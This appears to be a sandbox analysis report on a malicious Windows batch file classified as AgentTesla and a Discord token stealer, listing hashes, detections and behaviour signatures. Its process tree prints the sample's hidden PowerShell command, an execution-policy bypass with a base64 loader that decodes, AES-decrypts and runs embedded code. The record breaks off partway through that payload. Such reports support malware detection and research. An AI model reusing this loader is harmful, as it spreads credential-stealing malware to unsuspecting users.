Edit tour
Windows
Analysis Report
output.cmd
Overview
General Information
| Sample name: | output.cmd |
| Analysis ID: | 1630030 |
| MD5: | 3bb17dd59f3e455fb28d409dc653d494 |
| SHA1: | 003618ffc32d70875ce6f49f0f44f77c4393cb12 |
| SHA256: | a34665528493acf5eb1162c48fc8847e2921630b9e53e82ce5c5af5572e9aadc |
| Tags: | cmduser-lowmal3 |
| Infos: |   |
 | |
Detection
AgentTesla, Batch Injector, Discord Token Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Batch Injector
Yara detected Discord Token Stealer
Yara detected Powershell decode and execute
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Uses FTP
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6344 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\outpu t.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2004 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\output .cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 2308 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('JHVzZXJ OYW1lID0gJ GVudjpVU0V STkFNRTske Gd0dXIgPSA iQzpcVXNlc nNcJHVzZXJ OYW1lXGR3b S5iYXQiO2l mIChUZXN0L VBhdGggJHh ndHVyKSB7I CAgIFdyaXR lLUhvc3QgI kJhdGNoIGZ pbGUgZm91b mQ6ICR4Z3R 1ciIgLUZvc mVncm91bmR Db2xvciBDe WFuOyAgICA kZmlsZUxpb mVzID0gW1N 5c3RlbS5JT y5GaWxlXTo 6UmVhZEFsb ExpbmVzKCR 4Z3R1ciwgW 1N5c3RlbS5 UZXh0LkVuY 29kaW5nXTo 6VVRGOCk7I CAgIGZvcmV hY2ggKCRsa W5lIGluICR maWxlTGluZ XMpIHsgICA gICAgIGlmI CgkbGluZSA tbWF0Y2ggJ 146OjogPyg uKykkJykge yAgICAgICA gICAgIFdya XRlLUhvc3Q gIkluamVjd GlvbiBjb2R lIGRldGVjd GVkIGluIHR oZSBiYXRja CBmaWxlLiI gLUZvcmVnc m91bmRDb2x vciBDeWFuO yAgICAgICA gICAgIHRye SB7ICAgICA gICAgICAgI CAgICRkZWN vZGVkQnl0Z XMgPSBbU3l zdGVtLkNvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKCRtYXRja GVzWzFdLlR yaW0oKSk7I CAgICAgICA gICAgICAgI CRpbmplY3R pb25Db2RlI D0gW1N5c3R lbS5UZXh0L kVuY29kaW5 nXTo6VW5pY 29kZS5HZXR TdHJpbmcoJ GRlY29kZWR CeXRlcyk7I CAgICAgICA gICAgICAgI FdyaXRlLUh vc3QgIklua mVjdGlvbiB jb2RlIGRlY 29kZWQgc3V jY2Vzc2Z1b Gx5LiIgLUZ vcmVncm91b mRDb2xvciB HcmVlbjsgI CAgICAgICA gICAgICAgV 3JpdGUtSG9 zdCAiRXhlY 3V0aW5nIGl uamVjdGlvb iBjb2RlLi4 uIiAtRm9yZ Wdyb3VuZEN vbG9yIFllb GxvdzsgICA gICAgICAgI CAgICAgSW5 2b2tlLUV4c HJlc3Npb24 gJGluamVjd GlvbkNvZGU 7ICAgICAgI CAgICAgICA gIGJyZWFrO yAgICAgICA gICAgIH0gY 2F0Y2ggeyA gICAgICAgI CAgICAgICB Xcml0ZS1Ib 3N0ICJFcnJ vciBkdXJpb mcgZGVjb2R pbmcgb3IgZ XhlY3V0aW5 nIGluamVjd GlvbiBjb2R lOiAkXyIgL UZvcmVncm9 1bmRDb2xvc iBSZWQ7ICA gICAgICAgI CAgfTsgICA gICAgIH07I CAgIH07fSB lbHNlIHsgI CAgICBXcml 0ZS1Ib3N0I CJTeXN0ZW0 gRXJyb3I6I EJhdGNoIGZ pbGUgbm90I GZvdW5kOiA keGd0dXIiI C1Gb3JlZ3J vdW5kQ29sb 3IgUmVkOyA gICBleGl0O 307ZnVuY3R pb24gaWltc XooJHBhcmF tX3Zhcil7C SRhZXNfdmF yPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkFlc106O kNyZWF0ZSg pOwkkYWVzX 3Zhci5Nb2R lPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkNpcGhlc k1vZGVdOjp DQkM7CSRhZ XNfdmFyLlB hZGRpbmc9W 1N5c3RlbS5 TZWN1cml0e S5DcnlwdG9 ncmFwaHkuU GFkZGluZ01 vZGVdOjpQS 0NTNzsJJGF lc192YXIuS 2V5PVtTeXN 0ZW0uQ29ud mVydF06OkZ yb21CYXNlN jRTdHJpbmc oJ0pFWWRoR kY2bDRWOFh ENmJYMUJ5b FQyV2tIYkY rcmhRWGVXR 0hJbjF2OHM 9Jyk7CSRhZ XNfdmFyLkl WPVtTeXN0Z W0uQ29udmV ydF06OkZyb 21CYXNlNjR TdHJpbmcoJ zZvbkNrQzB odFJEWmpnT HZONUl0bnc 9PScpOwkkZ GVjcnlwdG9 yX3Zhcj0kY WVzX3Zhci5 DcmVhdGVEZ WNyeXB0b3I oKTsJJHJld HVybl92YXI 9JGRlY3J5c HRvcl92YXI uVHJhbnNmb 3JtRmluYWx CbG9jaygkc GFyYW1fdmF yLCAwLCAkc GFyYW1fdmF yLkxlbmd0a Ck7CSRkZWN yeXB0b3Jfd mFyLkRpc3B vc2UoKTsJJ GFlc192YXI uRGlzcG9zZ SgpOwkkcmV 0dXJuX3Zhc jt9ZnVuY3R pb24gcGVmZ m0oJHBhcmF tX3Zhcil7C SR2d3ducz1 OZXctT2JqZ